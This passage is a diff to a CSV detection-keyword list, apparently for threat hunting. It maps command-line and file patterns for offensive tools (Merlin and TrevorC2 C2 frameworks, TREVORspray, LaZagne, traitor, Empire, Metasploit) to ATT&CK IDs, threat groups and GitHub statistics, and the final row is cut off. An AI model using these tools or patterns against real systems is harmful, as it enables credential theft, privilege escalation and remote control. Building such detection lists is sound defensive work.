- TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" -"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4618","763","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" -"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3437","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z" +"*toteslegit.ps1*","offensive_tool_keyword","merlin","Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4619","762","2023-08-27T15:47:13Z","2017-01-06T11:18:20Z" +"*tplmap*","offensive_tool_keyword","tplmap","Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system. The sandbox break-out techniques came from James Ketts Server-Side Template Injection: RCE For The Modern Web App. other public researches [1] [2]. and original contributions to this tool It can exploit several code context and blind injection scenarios. It also supports eval()-like code injections in Python. Ruby. PHP. Java and generic unsandboxed template engines.","T1059 - T1210.001 - T1589 - T1175","TA0002 - TA0007 - TA0008 - ","N/A","N/A","Web Attacks","https://github.com/epinna/tplmap","1","0","N/A","N/A","10","3438","670","2023-08-31T14:59:40Z","2016-07-06T20:33:18Z" "*trailofbits/onesixtyone*","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","5","416","86","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "*trainr3kt/MemReader_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","26","3","2022-05-12T18:46:02Z","2021-04-21T20:51:25Z" "*trainr3kt/Readfile_BoF*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","10","10","17","4","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z" -"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" -"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*traitor -a *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --any *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -e *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor --exploit*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*traitor -p *","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*tree_connect_andx_request*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*TrevorC2*","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","10","10","1100","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" -"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorproxy subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorproxy ssh*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorproxy subnet*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*trevorsaudi/Mshikaki*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" -"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray -*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*trevorspray *--recon *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*trevorspray -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*trevorspray.cli*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.enumerators*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.looters*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.py*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray.sprayers*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/existent_users.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*trevorspray/valid_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-dev*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-master*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*TREVORspray-trevorspray*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*tricks01.hwtxt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*trickster0/Enyx*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*tricky.lnk*","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","2","105","38","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" -"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" -"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Trojan.Lazagne*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*truecrypt2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*True-Demon*","offensive_tool_keyword","Github Username","github repo hosting offensive tools and exploitation frameworks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/True-Demon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*trufflehog git *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12169","1420","2023-10-03T19:08:27Z","2016-12-31T05:08:12Z" -"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*--trusted-for-delegation --kdcHost *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*truffleHog*","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1083 - T1081 - T1213 - T1212","TA0002 - TA0003 - TA0004 - TA0007","N/A","N/A","Information Gathering","https://github.com/dxa4481/truffleHog","1","0","N/A","N/A","10","12176","1422","2023-10-04T20:56:03Z","2016-12-31T05:08:12Z" +"*TruffleSnout.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 